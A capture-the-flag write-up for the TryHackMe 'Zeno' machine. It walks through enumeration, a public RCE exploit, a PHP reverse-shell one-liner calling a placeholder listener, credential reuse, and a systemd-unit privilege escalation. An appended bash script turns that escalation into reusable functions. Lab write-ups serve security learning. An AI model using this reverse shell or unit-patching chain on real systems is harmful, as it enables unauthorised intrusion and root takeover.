Zeno - THM Writeup

Abdul Wassay (HotPlugin)
4 min read, Oct 31, 2021

Introduction:

Perform a penetration test against a vulnerable machine. Your end-goal is to become the root user and retrieve the two flags:

  • /home/{{user}}/user.txt
  • /root/root.txt

The flags are always in the same format, where XYZ is an MD5 hash: THM{XYZ}

The machine can take some time to fully boot up, so please be patient! :)

Overview:

Enumerating the network, I found two open ports (SSH on 22 and HTTP on 12340). Enumerating the web server, I found an RCE exploit for the Restaurant Management System (RMS) hosted there, which gave me a reverse shell. Enumerating the file system, I found plaintext credentials in a service's file that were reused for the SSH login. Finally, exploiting weak file permissions on that service's unit file, I easily got root.

Methodology:

Starting with a port scan, we found two open ports; one of them is hosting a web server.

Opening the web page, we get a custom 404, so we have to enumerate the web server further using gobuster.

Enumerating the web server with gobuster, we find a hidden directory.

Navigating to the page we found, it is some kind of restaurant management system.

As it is an RMS, there must be some kind of administrative login, so we keep enumerating.

Using gobuster, we found the admin login page.

But it was just a rabbit hole. I tried some default credentials, but they didn't work, so I went to Google. Thankfully, I found an RCE exploit for this RMS on Exploit-DB.

Exploit DB

Using searchsploit, I copied the exploit into my working directory.

Running the exploit successfully, we get a webshell.

To get a proper reverse shell instead of working through the webshell, I used the following PHP one-liner from the PayloadsAllTheThings repo, with a netcat listener on my machine. The address 10.0.0.1 and port 4242 are the repo's placeholders and have to be replaced with the IP and port your listener is actually bound to:

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Analyzing /etc/passwd, I found the user edward. To escalate my privileges to edward, I transferred linpeas.sh to the server for enumeration.

Using linpeas, we found plaintext credentials stored in a file.

Using the found credentials, we successfully log in over SSH as edward.

Now, to escalate to root: we know that we can run the reboot command with sudo, and from the earlier linpeas enumeration we also know that we have write permission on the monitoring service's file (screenshot below):

So, editing this file, I changed the command line that runs when the service starts at boot. That line will now set the SUID bit on /bin/bash, and since the service runs as root, the chmod runs as root too.

Now, upon rebooting the system, we should have a bash binary with the SUID bit set and owned by root.

After logging in again, we successfully get our root shell.
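The post-shell chain described above (hunt for plaintext credentials, find a writable service unit, swap in a payload, reboot, pick up the SUID shell) written out as reusable shell functions, with a dry run against a constructed sample tree in a temporary directory. This is an added example, not the author's commands and not the room's real files: the unit name zeno-monitoring.service, the monitoring.sh command, the sample credential and the temp-dir layout are all made up, and the script assumes GNU find/sed as found on a typical Linux target. The reboot and SSH steps are of course not performed by the script.

```shell
#!/usr/bin/env bash
# Added example for this writeup (not the author's code): the privilege
# escalation chain as functions. Paths, unit name and credential below are
# constructed for the demo; GNU find (-writable) and GNU sed (-i) are assumed.
set -u

# Step 1: the manual equivalent of linpeas' credential hunt. Recursive,
# case-insensitive grep for key=value / key: value pairs whose key looks
# like a secret (password, secret, token, with any suffix such as DB_PASSWORD).
find_cleartext_creds() {
    grep -rIEin \
        '(passw(or)?d|secret|token)[[:alnum:]_]*[[:space:]]*[=:][[:space:]]*[^[:space:]]+' \
        "$@" 2>/dev/null
}

# Step 2: service unit files the current user can modify, under the given
# directories. An attacker wants at least one hit; a defender wants none.
find_writable_units() {
    local dir
    for dir in "$@"; do
        find "$dir" -name '*.service' -writable 2>/dev/null
    done
}

# Step 3a: a patched unit only helps if the service runs as root, i.e. it
# has no User= line or User=root. Returns 0 when it runs as root.
unit_runs_as_root() {
    local user
    user=$(sed -n 's/^User=//p' "$1" | tail -n 1)
    [ -z "$user" ] || [ "$user" = "root" ]
}

# Step 3b: replace the ExecStart= command with the payload. On the next boot
# systemd runs it as root, so /bin/bash ends up SUID root. Fails (returns 1)
# if the unit has no ExecStart= line to replace.
patch_exec_start() {
    local unit="$1" payload="${2:-/bin/chmod +s /bin/bash}"
    grep -q '^ExecStart=' "$unit" || return 1
    sed -i "s|^ExecStart=.*|ExecStart=${payload}|" "$unit"
}

# Step 4, after "sudo reboot" and logging back in: is the SUID bit there?
# Note that bash resets its effective UID unless started with -p, so the
# root shell is obtained with "/bin/bash -p", not a plain "/bin/bash".
check_suid_bash() {
    [ -u "${1:-/bin/bash}" ]
}

# Walk the chain against a constructed sample tree in a temp dir. The last
# line printed is the patched ExecStart= line; no real file is touched.
demo_chain() {
    local root unit
    root=$(mktemp -d)
    mkdir -p "$root/etc/systemd/system"
    unit="$root/etc/systemd/system/zeno-monitoring.service"
    cat > "$unit" <<'EOF'
[Unit]
Description=Monitoring (constructed sample unit, not the real one)
After=network.target

[Service]
Type=simple
ExecStart=/usr/local/bin/monitoring.sh
Restart=always

[Install]
WantedBy=multi-user.target
EOF
    # Constructed config with a made-up credential so that step 1 fires.
    printf 'DB_HOST=localhost\nDB_PASSWORD=Sample_Not_Real_1\n' > "$root/etc/app.conf"

    find_cleartext_creds "$root/etc"
    find_writable_units "$root/etc/systemd/system"
    unit_runs_as_root "$unit" && patch_exec_start "$unit"
    grep '^ExecStart=' "$unit"
    rm -rf "$root"
}

demo_chain
```

On the real box the order is: find_cleartext_creds and find_writable_units for recon (linpeas does both for you), patch_exec_start on the writable unit once unit_runs_as_root agrees, then sudo reboot, log back in over SSH, check_suid_bash, and finally /bin/bash -p. The -p matters: bash drops the effective UID back to the real one on startup unless it is given, so a plain /bin/bash would leave you as edward. The fix is the inverse of step 2: unit files under /etc/systemd/system should be root-owned and not group- or world-writable, which makes find_writable_units return nothing for an unprivileged user.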

I hope you enjoyed. Thanks.
